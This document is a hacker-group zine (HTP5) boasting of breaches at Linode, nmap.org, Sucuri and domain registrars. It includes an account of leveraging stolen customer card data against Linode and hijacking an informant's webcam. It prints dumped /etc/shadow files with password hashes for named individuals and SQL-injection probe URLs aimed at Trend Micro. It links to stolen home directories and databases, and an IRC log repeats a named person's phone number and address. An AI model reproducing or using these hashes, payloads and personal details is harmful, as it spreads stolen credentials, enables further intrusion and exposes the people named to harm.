▒▒█▄▄ ▀▀▄▄ ░ ▒▒▒▒▒▒░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒▒ ░░░░░░░░░░░ ░░░░ ░░░░
▓▒▒▒▒██▄▄ ▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░░░ ░░░░░░░░░░ ░
▓▓███▓▓▒███▄░▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░ ░░░░░▄▄▄▄▀▀
▓▓█████████▓▒▄▄ ▀▀▀▄▄▄▒▒▒▒ ░░░░░░ ░ ░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▀░▒▒▒▓
▒▒▓▓██████████▓▓▓▒▄▄ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄▄▄▄▄▄▀▀▀▀▀▀▀ ▒▒▒▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▓▓▓█████
▒▒▒▓▓█████████▓▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▒▒▒▄▄▄▄▄▄▄▄▄▀▀▀▀▀▀▀▀▀▀▀▀▒▒▒▒▒▒▒▒░░░▒███▓▓████
▒▒▒▓██████████▒░░░░░░▒▒▒▒▒█████████████▓ ▒▒▒▒▒▒▒░░░ ░░░░░░░▒▒▓▓▓▓▓▓▒▒░░▒███▓████
▒▒▒▓▓█▓▒▒▒▀▀▀▀▀▀▄▄▄▄▄▄▄▄▒████████████████▒▀▀▀▀▀▄▄▄▄▀▀▀▀▀▀▒▓███████▒░▓██▒░▒█▓▓███
▒▒▒▓████████▓▒░░░░░░░██▒█████████████████▓░▒▒▒▒▒▒▒▒▒▒▒▒░▓████████▒ ▓███▒░░▒███▓
▒▒░▒██▒▓██████ ░░░░░░▓██████████████████▒░▒░░░░░░░░▒░▒████████ ▒████▓░░▓▓▓▓▒
░▒░░▓█░░▒▒▓██▓ ░░░░ ░███████████████████▒░ ▄ ▄▄ ▄░░███████▓ ░ ▓██████▓░▓▒▒▒░
░░░░▒█░░░░▒▓▓░░ ░░ ▒██████████████████▒▀▀▀▀▀░░▀▀▀▀▄██████▒ ░ ▓███████▒ ▓░
░ ░█▒ ░░▒▒░░ ░░░▒█████████████▓▓█▒▀░░░░░░░░░░░▀▒████▓ ▓██████▓░░ ▓
░░ █▒ ▒▒ ░░░░▓█████████▒▒▒░░░░░░░░ ░░░░░░░▒███▒▒▒███████▓ ░ ▓
░░░ ▓▒ ▒ ░▒ ░░ ░░▀▀▓▓▓▓▒░░░░░░░░░░ ░░ ░░░ ▒▓▓▓▓▓███▓▒▒ ░░ ▓
░ ▓▒ ▒▒ ▒▒░ ░░░░░░░░░░░░░░░░░ ░░ ░ ▒▓
░ ░░▓ ░░ ░▒░░ ░░ ░░░░░░ ░░░ ░░░░░ ░ ░▒ ▒
░░ ▓ ░░▒▒░░ ░░ ░░░░░ ░░░░ ░▒ ▓
░▓ ░▒▒░░ ░░░ ░░ ░░░ ░░ ░ ▒ ▒░
▓▒ ░░▒▒░░░ ░░░░░░░ ▀▀▀▄▒▒░░░░▒▄▀▀ ░ ▒ ▒
▒▓░░░░░░▒▒▒░░░░ ░░░░░░░ ░░░▒▒▓▒▒▒▒▓▓▓▓▓▒░░ ░▒ ▓
▒▓ ░░ ░▒▒░░░░░ ░░░▒▒▒▒▒▒▒▓▓█▓▒▒▒▒▒▒▒▒▒▓█▓▓▓▒░ ░▒ █░
▓░ ░▒▓▒░░░░░ ░░░▒▒▓▓▒▒▒▒▒▒▒░░ ░ ░░░▒▒▒██▒░ ░░▒░▒▒
▒▓ ░▒▓▓▒▒░░░░ ░░▒▒▒▒▒░░░░ ░░░░░░░░░ ░░ ░▒▓█▒ ░▒▒░▓
▒▓ ░ ▒▒▒▒▒░░░ ░░▒▒▒▒▒░░░░░░░░░▒▒▒▒▒▒░░░░░░░▒▒▒▒ ░▒▒▒▒▒
▒▒ ░ ▒▒▒░░░░ ░░▒▒░░░░▄▄▄▄▀▀▀▀▀▓▓█▀▀▀▄▄▄▄▒▓░░▒░ ░░▒▒░▒
▒▓ ░ ▒▒▒▒▒▒░░ ░▒▒░░░░ ░░░░ ░ ░░░ ░▒▒ ░░▒▒░ ▒
▒▒ ░ ▒▒▒▓▒▒░░ ░▒░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░ ░░░░▒▒▒▒▒▒░░ ▒
▓▒░▒░░ ░▒▒▓▓▒▒░░ ░▒░░░░░░░░░▒░▒▒▒▒▒▒▒▒░░░░░░░▒▒▓██▓▒ ░▒
░▒▓▓▒▒▒▒▒ ░▒▒▓▓▓▒▒░░░░░▒▓▒░ ░░░░▒░▒▒▓▓▒▒▒▒▒░░░░▒▒▓████▒ ░▒▒░
░▒▒▒▓▓▒▒▒▓▒░ ░▒▓▓▓▓▓▒▒░░░▒▒▓▒▒▒░░░▒▒░▒▒▓▓▓▓▒▒▒▒░▒▒▒▓████▓░ ░▒▒░░
░▒▒▓▒▒▒▓▓▓▓▓▓▒ ░ ▒▒▓▓▓▓▓▒▒▒▓▓▒▓▒▒▒▒▒░▒▒▒▓▓████▓▓▓▓▓▒▓████▓▒░ ░▒▒▒░░░░░
░▒▒▓▒▒░░▒▒█▓▓▓▓▒ ░░ ░▒▒▓███▓▓▓▓▓█▓▒▒▒▒▒▒▒▓▓▓▓███▓▓████████▒▒ ░▒▒▒▒▒░░░░░░
░▒▒▒▒ ▒▒▓█▒▒▓▒░ ░ ░ ░▒▒██████████▓▓▓▒▒▓████████████████▒▒ ░ ░▒▒▒▒▒▒░ ░░░
▒▒▒▒░ ▒▒▒▒▓▒▓▓▒░ ░ ░░▒▓▓█████████▓▓▓▓███████████████▓▒░ ░▒▒▒▒▒▒░
▒▒░ ▒▒▒▒▒█▓▓▒▒ ░░▒▒▒██████████████████████████▓▒▒ ▒▒▒▒▒▒▒░░
▒ ░░░▒▒▒▓██▒▒▒ ░ ░ ░▒▒▒▓█████████████████████▓▒▒░ ░ ▒▒▒▒▒▒░░░ ░
░ ░ ░░░░▒▒▒▒▓█▒▒░░░ ░░░▒▒██████████████████▓▓▒▒░ ░ ░▒▒▒▒░░░░░ ░░
░ ░ ░░░ ▒▒▒▒▒▒▓▓▒░░ ░ ░▒▒▓███▓▓▓█████▓▓▓▓▓▒▒░ ░░▒▒▒░░░░░ ░░░░
░ ░░░░░░ ░▒▒▒▒▒▒▒▓▒ ░ ░▒▒▓▓▓▒▒▓▓▓▓▒▒▒▒▓▒▒░ ░░░▒▒▒▒░░░░ ░░░░░
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"I'm positive they owned."
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄
██ ██ ███▄██ ██ ██ ██ ██ ██▄▄ HTP5
██ ██ ██ ▀██ ██▄██ ██▄█▀ ██▄▄
██ ▄▄ ▄▄
▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
* Before reading this section of HTP5, we recommend you pop some popcorn.
Following HTP4, we were promptly attacked by the next set of skids looking to
get baked by our terabit DDoS cannon. A group impersonating ac1db1tch3z decided
to take an alternative route, and located us through the development of one of
our botnets, Zodiac. We quickly switched into a fallback network and found out
they used SwiftIRC. SwiftIRC's nameservers were none other than Linode.
Oh by the way, actual AB, was your second backdoor in Unreal that eval() shell
stored in their PHPBB MySQL database? if so -- you've finally been expunged ;)
- HTP
Linode turned out to be safe from our null RDS pass 1day (before Adobe had
released their critical advisory). In the meantime, their registrar (name.com)
was taken out. We acquired their domain login (along with StackOverflow,
DeviantArt, etc.), and prepared a transparent proxy to gather Linode logins.
Speaking of registrars, Xinnet, MelbourneIT, and Moniker - you're all owned.
Back in November, we hinted at Huawei access in our Symantec release. Their
registrar? Xinnet. Total domains owned: about 5.5 million total. No kidding. :P
However, right in time, our very own HTP zeroday research division manifested
subzero.py: a zeroday giving us a direct route into Linode. We proceeded to
breach Linode and acquire their in-memory keys. This allowed us to download
Linode's databases and prepare to backdoor SwiftIRC via the LiSH console+
init=/bin/bash.
Meanwhile, we enjoyed our (root) access to Nmap, Nagios, SQLite, OSTicket,
Phusion Passenger (modrails), Mono Project, Prey Project, Pastie, Sucuri, Hak5,
Pwnie Express, Puppet, and oauth. It got better when we found Jen Emick and
xnite were customers, but that's getting into another story.
Unknown to us at the time, the FBI had successfully accessed HTP. They made
their presence obvious, as everything we would get was burned within a few days.
However, we merely considered it to be a leak, and waited to use Linode itself
to identify the source.
Soon after, the FBI alerted Linode that Nmap was being backdoored, unknowingly
identifying themselves as the source of the leaks within HTP. We still
considered it a leak, and told Linode that if they did not act upon our
already-gained access by 5/1, we would shred all of our Linode-related data.
This included 159,000+ decrypted CCs, usernames, $5 hashed passwords, LiSH
usernames, plaintext LiSH passwords, and employee logins. In the case of
noncompliance, we stated that we would drop it all in our release.
This was actually quite a good offer. We made it because we didn't care about
CCs to begin with (that's directed at everyone on Twitter blaming Linode for
identity theft) and because our primary target was SwiftIRC, not Linode. They
accepted to protect their customer data/CCs (there wasn't much choice).
The FBI got pissed off by this development and forced Linode's hand. After
informing them we would follow through and shred all of our Linode data within a
week, the FBI and Linode coordinated a release detailing the breach in an email
to their customers. We were confused. If they just did this on 5/1, nothing
would be affected? Apparently, the FBI did not trust us. We soon found out
Linode's situation was not voluntary.
Linode was between a rock and a hard place. They had to comply with the FBI
(immediately), but doing so would mean all 159,000+ customers would be on Full
Disclosure by 5/1. Recognizing their situation, we instead told them that if
they acknowledged HTP in their analysis, we'd go ahead and shred their customer
data anyway. Readily enabling carders was never part of our plan. They agreed,
and we proceeded to delete our copies of the data for them.
There was one more loose end to tie. We identified which users on HTP were
involved with the FBI, and promptly gained access to one of their cams. Sure
enough, there was a handler standing behind him, monitoring his involvement
in HTP (hi!).
The FBI lost their access into HTP.
So what's in this release, if not Linode? EDIT: Hahaha we guess that was too
hot, we'll give you guys registrar data instead.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss1.png
|- 193K | Linode blog post screenshot 1
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss2.png
|- 179K | Linode blog post screenshot 2
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/registrardata.txt
|- 70K | Data on the registars mentioned above.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
░░░░
░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░░░
░░░▒▒▒▒░░░░░░░░░░░░▒▒▒▒▒▒░░░
░░▒▒▒▒░░ ░░░▒▒░░▒░░
░░░░░▒░░ ░░▒▒░░░▒░
░░░░░▒░░░ ░░▒░░░░░░
░░░▒░▒░▒░░ ░▒▒░░░░▒░░
░░░░▒▒▒░▓▒░▒░ ░░▒░░░░░░▒░
░░░░░░▓█▓█▓▒░░░ ░░▒░░░░░░░░▒░
░░░░░░▒▓████▓▒▒░░ ░░░▒░░░▒▒▒▒▒░░░░░░░░▒░
░░░░░░░▒▒███▓▓░░░ ░░░░░▒▒░░░▒░▒▒▒▓▓▓▓▒░░░░░░░░▒░░░
░░░░░░▒▒░░░▓█▓▒░▒ ░░░▒░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░
░░░░░░▒▒░▒▒▒░▒▓▒░ ░░▒▒▒░▒▒▒▓▓▓▓▓▓█▓███▓▓▒░░░░░░░░░░░
░░░░░░░░░░▓▓▒▓▒░░░ ░░░▒▒▒▒▒░▒░░▒▒▒▓▓▓████▓▓░░░░░░░░▒▒░
░░░░░░░░▒░▒░░░▒▓▒░░ ░░▒░░░░░▒▒▒▒▒░░░▒▒▓▓▓███▓░░░░░░░░▒░░
░░░░░░░░░░▒▒░░▓█▓▒░ ░░▒▒▒▒░░▒▓▒▒░▒▒▒▒░░░▒░░▒▓▓▓▒░░░░░░▒░░
░░░░░░░░░░░▒░▒▒▓░░░░ ░▒▒▓▓▓▓▓▓▓▓▓█▓▒▒░░░▒▒▒▒░░░▒▒░░░░░░░▒▒░
░░░░░░░░░░░▒░░▒▒▒░░░░░░ ░░░░▓███████████████▓▓▒░▒▒▒▒▒░░▒▒░░░░▒▒░
░░░░░░░░░░░▒▒▒▒░░▒░░░░░░░░░░░▒▓▓███████████████████████▓▓▓▓▒▒░░░░░
░░░░░░░░░░░░░░░▒▒░░░░░░░░░░░░░░░░░▓████████████████████████▓▒▓▒▒▒░
░░░░░░░░░░░░░░░▒▓░▒░░░░░░░░░░░░░░░░▓██████████████████████████▓▓▒▒░
░░░░░░░░░░░░░░░░░░▓▓▒▒░░░░▒░▒░░░░░░░░▒████████████▓▒▒▓█████████▓▓▓░▒░
░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░░▒▒░░░░░░▒▒░░░░░░░▒▒▓███████▓▓▓▒▒▒▒█████████▓▓▒░▒░
░░░░░░░▓▓▓▒▒▓████████▓▒░░░░░░░▒▒▓▓▓▓░░▒░░░░░░▒▒▓▓▓▓▓▒▒░░░░░▓███████▓▓▓░░░
░░░░░░░░▒▒░░▒▓░▒███████▒░░░░░░░▒▒▓▓▓██▓░░░░░░░░░▒▓▓▒░▒░░▒░░░▒░██████▓▓▓░▒░
░░░░░░░░▒░██▓▓▓░░▓████▒░▒░░░░░░░░█▓▓▓▓▒▒▒▒▒▒▒▒▓▓▒▓▓▓▓▓▒▒░▒░░░▒▒████▓▓▒▒▒░
░░░░░░▒░▒▒█▓▓███▓░░▓█▓░▒▒▓▒▒░░░░▒█▓▓▒░▒░▒▒▒▒▒░░▒░░░▓█████▓███▓▒██▓▓▓▒▒▒░
░░░░░▒▒▓░▒▒▓▓▒▓███▒▒▓▒░░▒██▓░░░░▒██▓▒▒░░░▒▒░░░░░░░░░░▒▓██▓▓░▒▓███▒▓░░░░
░░░░▒▒░▒▓▒▒▒▓▓▒▓███▓░▒░░▒███▓▒░░░▓██▓▒▒░░░░░▒▒░░░░░░░░░▒█▓▓░▒▒▓▓▓▓░▒░
░░░▒▒▒▓▓▓▒▒▒▒░▓▓▒▓███▓▒▒▒▓███▓░░▒▒▓▓▒░▒▒░▒▒▒▓▓▓▓░▒▒▒▓▓▓▒▒▓▒░░▒░▓▓░░░
▒▒▒▓▓▓▓▓▓▒░░▒░▒▒▓░░▓██▓░▒▒▓██▓▓▒▒▓▓░░▒▒░░░▒░▓▓██▒▒▒▓███████▓░▒░▒░░░
░▒░░▒█▓▒▒▒░░▒▒▒░▒▓▒░▒▓█▓▓▒░▓█▓▓█▓▓▒▒░░░▒▒░▒▒▒░▓▓▓▓▓▓▓██▓▓▒▒▓█▒▒░▒░
▒░░▒▒░▒▓░▒▒▒░░▒▒▒▒▓▓▒▒▓██▓▒▒▒▓███▓▓░░░░▒▒▓▓▒░░▒▒███▓▓██▀▀▓▓▓█▓▒▒░
░░░░░▒▒░▒▓▒▒▒░▒░░▒▒▓▓▓▒▓█▓▓▒▒░▓███▓▓▒░░░▒▒▒▓▒▒▓▓████████████▓▒▒░
░▒▒░░░░▒▒▒▒▒░▒░░▒░░▓▓▓▓▓▓█▓▓▒░▒▒██▓██▓▒░░░░░░░▒░▒▒▒▓▓▓█████▓▒▒░
▒▒▒▒▒▒░░░▒░▒▒▒▒░░▒▒▓▓▓▓▓▓████▒▒▒▒▓█████▓▒▒▒▒▒░░░▒░░▒▒▒▓████▒▒░░
░▓▒▓▒▒▒▒░░░▒▒░▒▒░▒▓▓▓▓▓▓▓▓████▓▒░▓▓██▓█████▓▓▓▓▒▒▒▓▓▓▓███▓▒▒░░
░▒▓▓▓▒▒▒▒▒▒▒░▒░▒▒▒▒▓▓▒░▓▓▒▓████▓░▒▓▓█████████████████████▓░░░░
▒░▓░▓▒▒▒▒▒▒░▒░░▒▒▒▓▓▓▓▓░▒▒░▒▓███▓░░▒███████████████████▓░▒░▒░░
▒▓▓▒▓░▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▓▓▓░▒▒▓██▒▒░▓██████████████████▒▒░▒░░░░
▒█▓▓▒▒▒▒▒▒▒▒░▒▒░░▒▒░▒▓▓▓▓▓█▓▒▒▒▓██░▒▓▓████████████████▓▓▒░▒▒▒░░
░▓░░▒░░▒▒▒▒▒▒▒▒░▒▒░▒▒▓▓▓▓████▓▓▓██▓░▓▓▓███████████████▓▓▓░▒░░▒░░
░░▒▒▒░▒░▒▒▒▒▒░▒▒░▒░░▒░▒▓▒▒████▓████▒░█▓███████████████▓▓█▒▒░░░░░░░
░░░░░░▒▒░░░▒▒▒▓▒▒▒▓░▒▒▒▓▓▓█▓▓▓██████░█▓▓██████████████▓██▓▒░░░░░▒░░
░░░░░░▒▒▒▒▒░░▒▒▒░▒▒▒▒░▒▓▓▓▓██▓▓▓▓███▒▓█▓██████████████▒██▓▒▒░▒░▒░▒░░
░░░░░░░░░░░░░░░░░░░░▒▒░░░░▒░░░▒░░▒▒▒▒▓▒▓▓▓██▓▓▓▓▓██▓█▓░▒▒░▒▒░░░░░▒▒░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒░▒▒░▒▒▒▒░░▒▒▒▒░░░░░▒▒░▒▒▓░░░▒▒░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒▒▒░░░░░░░░░▒▒░░
░░░░░░░░░░
"You have to let it all go. Fear, doubt, and disbelief."
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄
███▄ ██ ██▀▄▀██ ██ ██ ██ ██ HTP5
██ ▀█▄██ ██ ▀ ██ ██▀██ ██▀▀
██ ▀██ ██ ██ ██ ██ ██ Whoa. Did we just backdoor Trinity?
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Access to nmap.org (Insecure) was gained through Linode, which also included
svn.nmap.org and Seclists. Based on our approximations, the FBI went into holy-
shit mode beginning when we were backdooring it. We decided to withhold the
private releases, including DARPA CINDER Nmap, and release to you the unabridged
contents of the /home/ directory including those of Fyodor (Gordon Lyon) and
David Fifield. Before we drop you into nmap.com, though, here's their
/etc/shadow for those curious:
[root@web etc]# cat shadow
root:$1$9e0033fd$9M4AIYi9o1.wcm07WGUTZ0:14746:0:99999:7:::
bin:*:14746:0:99999:7:::
daemon:*:14746:0:99999:7:::
adm:*:14746:0:99999:7:::
lp:*:14746:0:99999:7:::
sync:*:14746:0:99999:7:::
shutdown:*:14746:0:99999:7:::
halt:*:14746:0:99999:7:::
mail:*:14746:0:99999:7:::
news:*:14746:0:99999:7:::
uucp:*:14746:0:99999:7:::
operator:*:14746:0:99999:7:::
games:*:14746:0:99999:7:::
gopher:*:14746:0:99999:7:::
ftp:*:14746:0:99999:7:::
nobody:*:14746:0:99999:7:::
vcsa:!!:14746:0:99999:7:::
ntp:!!:14746::::::
sshd:!!:14746::::::
fyodor:$1$71vbn0Qa$34cy/K1mp8ag4C7I3eXqS/:14782:0:99999:7:::
david:$1$cVie3LDG$WOrypVpCcBl.UyA8TKRX20:14783:0:99999:7:::
xfs:!!:14782::::::
apache:!!:14782::::::
web:!!:14782:0:99999:7:::
postfix:!!:14782::::::
webalizer:!!:14783::::::
mysql:!!:14896::::::
postgres:!!:14897::::::
distcache:!!:14924::::::
pcap:!!:15615::::::
mailman:!!:15666::::::
Yep, those are $1. We'll give them the benefit of the doubt: Linode used AES.
By the way, Fyodor, thanks for amis-6.01.DARPA1.tar.gz. We'll be sure to give it
a spin.
AMIS - Adversary Mission Identification System
==============================================
The Adversary Mission Identification System (AMIS) is a computer program
that analyzes logs of network scans and reports possible signs of an
adversary mission.
The AMIS is designed to work with the logs produced by the Nmap Security
Scanner. It is part of an overall defensive system that includes
periodic scans and their analysis.
The AMIS checks for these "tells" that may be signs of an insider
mission:
* Newly opened ports, particularly those of file servers (e.g. HTTP,
FTP, and P2P services).
* Differences in files shared by known file servers, including new
files, deleted files, and changes in file metadata.
* Security vulnerabilities in servers.
Enjoy this section of HTP5.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Nmap/home.tgz
|- 16GB | Nmap.org: /home/
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
<~REDACTED_1> lol
<~REDACTED_1> i got a dmca from cloudflare
<INFO> REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has quit [Client exited]
<~REDACTED_3> dmca?
<~REDACTED_3> whats copyrighted
<~REDACTED_1> Reporter's Name: Gordon Lyon
<~REDACTED_1> Reporter's Email Address: gordon@insecure.com
<~REDACTED_1> Reporter's Title: CTO
<~REDACTED_1> Reporter's Company Name: Insecure.Com LLC
<~REDACTED_1> Reporter's Telephone Number: 650-989-4206
<~REDACTED_1> Reporter's Address: 370 Altair Way #113 Sunnyvale, CA US
<~REDACTED_1> Reported URLs:
<~REDACTED_1> http://straylig.ht/zines/htp5/0x03_nmap.txt
<~REDACTED_1> Original Work: They released 16GB of our copyrighted data
which they stole. I don't know if copyright applies to our password file,
which they stole and released on this page, but it certainly applies to our
Adversary Mission Identification System described on the page.
<INFO> REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has joined #thegibson
<INFO> mode/#thegibson [+a REDACTED_2] by chippy1337
<~REDACTED_3> well
<~REDACTED_3> that would fit the bill
<~REDACTED_3> lets call him up
<~REDACTED_3> and take this
<~REDACTED_3> to internet court
<~REDACTED_3> im seriously considering
<~REDACTED_3> printing this out
<~REDACTED_3> and framing it on my wall
<~REDACTED_3> cuz im lolin so hard
<~REDACTED_3> 'sorry, there is a minimum requirement of 20GB before DCMAs are
considered admissable in Internet Court'
<&REDACTED_4> "What's that? You say there's a hostage situation in your
apartment?! We'll call the police right away, sir."
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
lol
▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄
██ ██ ██ ██ ██ ██ ██▄▄█ ██ HTP5
██▄▄▄▄▄▄ ██▄▄██ ██▄▄▄ ██▄▄██ ██ ▀▄▄▄▄▄██▄▄▄
██
▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
"Sucuri is a company that offers a security service that detects unauthorized
changes to network (cloud) assets, including web sites, DNS, Whois records, SSL
certificates and others. It is also heavily used as an early warning system to
detect Malware, Spam and other security issues on web sites and DNS hijacking."
Sucuri, why didn't you announce that you got owned? Pretty useless warning
system, if you ask us.
[root@sucuri www]# uname -a
Linux sucuri.net 2.6.39.1-linode34 #1 SMP Tue Jun 21 10:29:24 EDT 2011 i686 i686
i386 GNU/Linux
2001, here we come
[root@sucuri www]# cat /etc/shadow
root:iFvywDsrRwmjI:15755:0:99999:7:::
bin:*:14746:0:99999:7:::
daemon:*:14746:0:99999:7:::
adm:*:14746:0:99999:7:::
lp:*:14746:0:99999:7:::
sync:*:14746:0:99999:7:::
shutdown:*:14746:0:99999:7:::
halt:*:14746:0:99999:7:::
mail:*:14746:0:99999:7:::
news:*:14746:0:99999:7:::
uucp:*:14746:0:99999:7:::
operator:*:14746:0:99999:7:::
games:*:14746:0:99999:7:::
gopher:*:14746:0:99999:7:::
ftp:*:14746:0:99999:7:::
nobody:*:14746:0:99999:7:::
vcsa:!!:14746:0:99999:7:::
ntp:!!:14746::::::
sshd:!!:14746::::::
dre:mAuUxgVOcOeAE:15678:0:99999:7:::
apache:!!:14898::::::
mysql:!!:14898::::::
mailnull:!!:14946::::::
smmsp:!!:14946::::::
ossec:!!:15461:0:99999:7:::
^ OSSEC? Here, We're sure you'll get a kick out of this:
TrendMicro (owns OSSEC) DB access via SQLi:
http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=5
http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=4
Included in this segment of HTP5 are the databases of Sucuri's primary site,
though labs.sucuri.net and the rest of their VPS's were also compromised.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Sucuri/dbs.tgz
|- 2.1MB | Sucuri WP DB's
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"GREGORY D. EVANS, BABY! NUMBA 1!"
░░░▒▒▒▒░░░░░░░
░░▒▒▒▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒▒░░
░▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒░
░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▓▓▒▒▒▒▒
▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒░
▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒
▒▒▒▒▒▒▒▒░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒
▒▒▒▒▒▒▒░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
░▒▒▒▒▒▒░░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
▒▒▒▒▒▒▒░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
▒▒▒▒▒▒▒▒░░░░░░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
░▒▒▒▒▒▒▒▒░░░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓░
